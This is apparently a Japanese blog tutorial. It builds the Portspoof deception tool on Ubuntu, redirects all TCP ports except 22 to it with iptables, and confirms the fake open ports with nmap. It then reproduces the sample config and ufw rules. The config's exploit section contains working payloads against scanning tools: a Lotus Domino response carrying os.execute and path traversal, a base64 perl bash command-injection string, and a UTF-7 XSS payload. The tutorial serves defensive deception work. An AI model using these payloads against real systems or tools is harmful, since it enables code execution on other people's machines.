Skip to content

portspoof を使って全ポートの TCP 通信に応答する

Portspoof を使うと「任意の TCP ポートが Listen しているように見せかける」「任意の TCP ポート宛の通信に対して、指定したレスポンスを応答する」ということが出来るようです。 尚、インストールから利用までの手順は GitHub 上の Doc に記載されています。

検証環境

対象 バージョン
Ubuntu 24.04.1

開発環境の用意

Portspoof はソースコードのみ配布されており、バイナリの配布は無いようです。 その為、ソースコードをコンパイルする必要がありますので、開発環境を用意します。

apt -y install build-essential

ソースコードからコンパイルする

GitHub からソースコードを取得し、コンパイル&インストールします。

curl -LO https://github.com/drk1wi/portspoof/archive/master.zip
unzip master.zip
cd portspoof-master
./configure --sysconfdir=/etc/
make
sudo make install

NAT ルールを定義する

Portspoof 本体はデフォルトで TCP/4444 を Listen します。 その為、任意の TCP ポート宛の通信は iptables の NAT ルールを使って TCP/4444 へ転送します。 SSH 接続する為に TCP/22 だけは NAT 対象から除外しています。

iptables -t nat -A PREROUTING -i ens2 -p tcp -m tcp --dport 1:21 -j REDIRECT --to-ports 4444
iptables -t nat -A PREROUTING -i ens2 -p tcp -m tcp --dport 23:65535 -j REDIRECT --to-ports 4444

iptables -L -t nat を実行し、NAT ルールが設定されていることを確認します。

# iptables -L -t nat
Chain PREROUTING (policy ACCEPT)
target     prot opt source               destination
REDIRECT   tcp  --  anywhere             anywhere             tcp dpts:tcpmux:ftp redir ports 4444
REDIRECT   tcp  --  anywhere             anywhere             tcp dpts:telnet:65535 redir ports 4444

Chain INPUT (policy ACCEPT)
target     prot opt source               destination

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination

Chain POSTROUTING (policy ACCEPT)
target     prot opt source               destination

実行する

Portspoof をデーモンとして実行します。

portspoof -c /etc/portspoof.conf -s /etc/portspoof_signatures -D

オプションの意味は以下の通りです。

オプション 意味
-c 設定ファイルを指定する
-s シグネチャを指定する
-D デーモンモードで起動する

Portspoof が TCP/4444 を Listen していることが分かります。 TCP/4444 以外は Listen していません。

# lsof -c portspoof
COMMAND    PID   USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
portspoof 1232 daemon  cwd    DIR  253,1     4096    2 /
portspoof 1232 daemon  rtd    DIR  253,1     4096    2 /
portspoof 1232 daemon  txt    REG  253,1  1384496 7962 /usr/local/bin/portspoof
portspoof 1232 daemon  mem    REG  253,1  2125328 6555 /usr/lib/x86_64-linux-gnu/libc.so.6
portspoof 1232 daemon  mem    REG  253,1  2592224 5158 /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.33
portspoof 1232 daemon  mem    REG  253,1   952616 6558 /usr/lib/x86_64-linux-gnu/libm.so.6
portspoof 1232 daemon  mem    REG  253,1   183024 6539 /usr/lib/x86_64-linux-gnu/libgcc_s.so.1
portspoof 1232 daemon  mem    REG  253,1   236616 6552 /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2
portspoof 1232 daemon    0r   CHR    1,3      0t0    5 /dev/null
portspoof 1232 daemon    1w   CHR    1,3      0t0    5 /dev/null
portspoof 1232 daemon    2w   CHR    1,3      0t0    5 /dev/null
portspoof 1232 daemon    3u  IPv4   8073      0t0  TCP *:4444 (LISTEN)

別のコンピュータからポートスキャンしてみる

Portspoof を実行している側のコンピュータでは TCP/1234 を Listen していません。

# lsof -i:1234
#

nmap を使って別のコンピュータからポートスキャンを実行すると open と判定されていることが分かります。

# nmap -sT 10.0.0.1 -p 100
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-24 21:30 JST
Nmap scan report for 10.0.0.1
Host is up (0.0010s latency).

PORT     STATE SERVICE
1234/tcp open  hotline
MAC Address: 52:54:00:0F:D6:58 (QEMU virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.08 seconds

参考

# portspoof -h
Usage: portspoof [OPTION]...
Portspoof - service emulator / frontend exploitation framework.

-i                        ip : Bind to a particular  IP address
-p                        port : Bind to a particular PORT number
-s                        file_path : Portspoof service signature regex. file
-c                        file_path : Portspoof configuration file
-l                        file_path : Log port scanning alerts to a file
-f                        file_path : FUZZER_MODE - fuzzing payload file list
-n                        file_path : FUZZER_MODE - wrapping signatures file list
-1                        FUZZER_MODE - generate fuzzing payloads internally
-2                        switch to simple reply mode (doesn't work for Nmap)!
-D                        run as daemon process
-d                        disable syslog
-v                        be verbose
-h                        display this help and exit

/etc/portspoof.conf

/etc/portspoof.conf
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
# This is an example Portspoof configuration file
#
#       :Examples:
#
# 1. SINGLE PORT
#
#       port "payload"
#
# 2. PORT RANGE
#
#       port_nr_start-port_nr_start "payload"
#
# 3. PAYLOAD: Hex Encoded (useful for exploits)
#
#       port "\x20\x20\x41\x41\x41 string payload"
#
# 4. PAYLOAD: Regular expressions
#
#       port "regular_expression [\w]+ ..."
#Example: Send custom payload (this can be a simple string)
1 "550 12345 0000000000000000000000000000000000000000000000000000000"
2 "550 12345 0000000000000000000000000000000000000000000000000000000"
3 "550 12345 0000000000000000000000000000000000000000000000000000000"
4 "550 12345 0000000000000000000000000000000000000000000000000000000"
5 "550 12345 0000000000000000000000000000000000000000000000000000000"
6 "550 12345 0ffffffffffffffffffffffffffffffffffffffffffffffffffff00"
7 "550 12345 0fffffffffffff777778887777777777cffffffffffffffffffff00"
8 "550 12345 0fffffffffff8000000000000000008888887cfcfffffffffffff00"
9 "550 12345 0ffffffffff80000088808000000888800000008887ffffffffff00"
10 "550 12345 0fffffffff70000088800888800088888800008800007ffffffff00"
11 "550 12345 0fffffffff000088808880000000000000088800000008fffffff00"
12 "550 12345 0ffffffff80008808880000000880000008880088800008ffffff00"
13 "550 12345 0ffffffff000000888000000000800000080000008800007fffff00"
14 "550 12345 0fffffff8000000000008888000000000080000000000007fffff00"
15 "550 12345 0ffffff70000000008cffffffc0000000080000000000008fffff00"
16 "550 12345 0ffffff8000000008ffffff007f8000000007cf7c80000007ffff00"
17 "550 12345 0fffff7880000780f7cffff7800f8000008fffffff80808807fff00"
18 "550 12345 0fff78000878000077800887fc8f80007fffc7778800000880cff00"
19 "550 12345 0ff70008fc77f7000000f80008f8000007f0000000000000888ff00"
20 "550 12345 0ff0008f00008ffc787f70000000000008f000000087fff8088cf00"
21 "550 12345 0f7000f800770008777000000000000000f80008f7f70088000cf00"
22 "550 12345 0f8008c008fff8000000000000780000007f800087708000800ff00"
23 "550 12345 0f8008707ff07ff8000008088ff800000000f7000000f800808ff00"
24 "550 12345 0f7000f888f8007ff7800000770877800000cf780000ff00807ff00"
25 "550 12345 0ff0808800cf0000ffff70000f877f70000c70008008ff8088fff00"
26 "550 12345 0ff70800008ff800f007fff70880000087f70000007fcf7007fff00"
27 "550 12345 0fff70000007fffcf700008ffc778000078000087ff87f700ffff00"
28 "550 12345 0ffffc000000f80fff700007787cfffc7787fffff0788f708ffff00"
29 "550 12345 0fffff7000008f00fffff78f800008f887ff880770778f708ffff00"
30 "550 12345 0ffffff8000007f0780cffff700000c000870008f07fff707ffff00"
31 "550 12345 0ffffcf7000000cfc00008fffff777f7777f777fffffff707ffff00"
32 "550 12345 0cccccff0000000ff000008c8cffffffffffffffffffff807ffff00"
33 "550 12345 0fffffff70000000ff8000c700087fffffffffffffffcf808ffff00"
34 "550 12345 0ffffffff800000007f708f000000c0888ff78f78f777c008ffff00"
35 "550 12345 0fffffffff800000008fff7000008f0000f808f0870cf7008ffff00"
36 "550 12345 0ffffffffff7088808008fff80008f0008c00770f78ff0008ffff00"
37 "550 12345 0fffffffffffc8088888008cffffff7887f87ffffff800000ffff00"
38 "550 12345 0fffffffffffff7088888800008777ccf77fc777800000000ffff00"
39 "550 12345 0fffffffffffffff800888880000000000000000000800800cfff00"
40 "550 12345 0fffffffffffffffff70008878800000000000008878008007fff00"
41 "550 12345 0fffffffffffffffffff700008888800000000088000080007fff00"
42 "550 12345 0fffffffffffffffffffffc800000000000000000088800007fff00"
43 "550 12345 0fffffffffffffffffffffff7800000000000008888000008ffff00"
44 "550 12345 0fffffffffffffffffffffffff7878000000000000000000cffff00"
45 "550 12345 0ffffffffffffffffffffffffffffffc880000000000008ffffff00"
46 "550 12345 0ffffffffffffffffffffffffffffffffff7788888887ffffffff00"
47 "550 12345 0ffffffffffffffffffffffffffffffffffffffffffffffffffff00"
48 "550 12345 0000000000000000000000000000000000000000000000000000000"
49 "550 12345 0000000000000000000000000000000000000000000000000000000"
50 "550 12345 0000000000000000000000000000000000000000000000000000000"
#Example: port range
51-60 "550 4m2v4 (FUZZ_HERE)"
#Example: Simple regular expression payloads
8080 "word: [\w]+ [\d]+ [a-b]+ [1-2]+\n"
8081 "OK0100 eXtremail V([\d.]+) release (\d+) REMote management \.\.\.\r\n"
8082 "word: ... \. \d \w \n"
#Nmap regular expression matched payloads
8100 "220 FUZZ_HERE ESMTP OpenSMTPD\r\n"
8101 "220 FUZZ_HERE SMTP ready to roll\r\n"
8102 "550 12345 FUZZ_HERE"
8103 "+OK Lotus Notes POP3 server version lLlfMoHcd ready j* on __FUZZ_HERE__\r\n"
8104 "HTTP/1.0 200 OK\r\nServer: Apache/__FUZZ__(Amazon)\r\nX-Powered-By: ASP\.NET\r\nCache-Control: no-cache, must-revalidate\r\nContent-type: text/html\r\nX-P
owered-By: PHP/xxx\r\nExpires: Mon, 26 Jul 1997 05:00:00 GMT\r\n<title>Log In - Juniper Web Device Manager</title><address>Apache mod_perl/2.0.4 Perl/v5.10.1 Se
rver at devtest.myhost.co.za Port 80</address>"
## EXPLOITS ##
# NMAP
# nmap --script http-domino-enum-passwords.nse -p 80 172.16.37.145  -sC -PN -n --script-args domino-enum-passwords.username='xxx',domino-enum-passwords.password
='secr',domino-enum-passwords.idpath='/tmp/'  -d4
80 "HTTP/1\.0 200 OK\r\nServer: Apache/(IBM_Lotus_Domino_v\.6\.5\.\d)\r\n\r\n--<html>\r\n--<body><a href=\x22user-UserID\x22>\r\n--<input name=\x22HTTPPassword\
x22  value=\x22PPASSS\x22>\r\n--<input name=\x22FullName\x22 value=\x22\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2fusr\x2flocal\x2fshare\x2fnmap\x2fscripts\
x2fhttp-domino-enum-passwords\x2ense\x00\x61\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c
\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c
\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c
\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x25\x64\x0d\x0a--\x22>\r\n\r\n--<a href=\x22\%?OpenDocument
ddddd\x22>\r\n--<form action=\x22aaa?ReadForm&\x22>\r\n--</body>\r\n--</html>\r\nos\x2eexecute\x28\x22echo 'You have been PWNed';whoami; uname -a\x22\x29;\x0d\x
0a\x0d\x0a"
#OS cmd injection payload for bash: $(cat output) and `cat output` injections
8080 "/bin/bash\t-c\t{perl,-e,$0,useSPACEMIME::Base64,cHJpbnQgIlBXTkVEXG4iIHggNSA7ICRfPWBwd2RgOyBwcmludCAiXG51cGxvYWRpbmcgeW91ciBob21lIGRpcmVjdG9yeTogIiwkXywiLi
4uIFxuXG4iOw==}\t$_=$ARGV\x5b0\x5d;~s/SPACE/\x5ct/ig;eval;$_=$ARGV\x5b1\x5d;eval\x28decode_base64\x28$_\x29\x29;"
#McAffe SuperScan UTF7 XSS payload
1010 "+ADw-img src=x onerror='a setter=alert,a=\x22UTF-7-XSS\x22;'+AD4-"

/etc/ufw/before.rules

/etc/ufw/before.rules
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
#
# rules.before
#
# Rules that should be run before the ufw command line added rules. Custom
# rules should be added to one of these chains:
#   ufw-before-input
#   ufw-before-output
#   ufw-before-forward
#
# Don't delete these required lines, otherwise there will be errors
*filter
:ufw-before-input - [0:0]
:ufw-before-output - [0:0]
:ufw-before-forward - [0:0]
:ufw-not-local - [0:0]
# End required lines
# allow all on loopback
-A ufw-before-input -i lo -j ACCEPT
-A ufw-before-output -o lo -j ACCEPT
# quickly process packets for which we already have a connection
-A ufw-before-input -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A ufw-before-output -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A ufw-before-forward -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
# drop INVALID packets (logs these in loglevel medium and higher)
-A ufw-before-input -m conntrack --ctstate INVALID -j ufw-logging-deny
-A ufw-before-input -m conntrack --ctstate INVALID -j DROP
# ok icmp codes for INPUT
-A ufw-before-input -p icmp --icmp-type destination-unreachable -j ACCEPT
-A ufw-before-input -p icmp --icmp-type time-exceeded -j ACCEPT
-A ufw-before-input -p icmp --icmp-type parameter-problem -j ACCEPT
-A ufw-before-input -p icmp --icmp-type echo-request -j ACCEPT
# ok icmp code for FORWARD
-A ufw-before-forward -p icmp --icmp-type destination-unreachable -j ACCEPT
-A ufw-before-forward -p icmp --icmp-type time-exceeded -j ACCEPT
-A ufw-before-forward -p icmp --icmp-type parameter-problem -j ACCEPT
-A ufw-before-forward -p icmp --icmp-type echo-request -j ACCEPT
# allow dhcp client to work
-A ufw-before-input -p udp --sport 67 --dport 68 -j ACCEPT
#
# ufw-not-local
#
-A ufw-before-input -j ufw-not-local
# if LOCAL, RETURN
-A ufw-not-local -m addrtype --dst-type LOCAL -j RETURN
# if MULTICAST, RETURN
-A ufw-not-local -m addrtype --dst-type MULTICAST -j RETURN
# if BROADCAST, RETURN
-A ufw-not-local -m addrtype --dst-type BROADCAST -j RETURN
# all other non-local packets are dropped
-A ufw-not-local -m limit --limit 3/min --limit-burst 10 -j ufw-logging-deny
-A ufw-not-local -j DROP
# allow MULTICAST mDNS for service discovery (be sure the MULTICAST line above
# is uncommented)
-A ufw-before-input -p udp -d 224.0.0.251 --dport 5353 -j ACCEPT
# allow MULTICAST UPnP for service discovery (be sure the MULTICAST line above
# is uncommented)
-A ufw-before-input -p udp -d 239.255.255.250 --dport 1900 -j ACCEPT
# don't delete the 'COMMIT' line or these rules won't be processed
COMMIT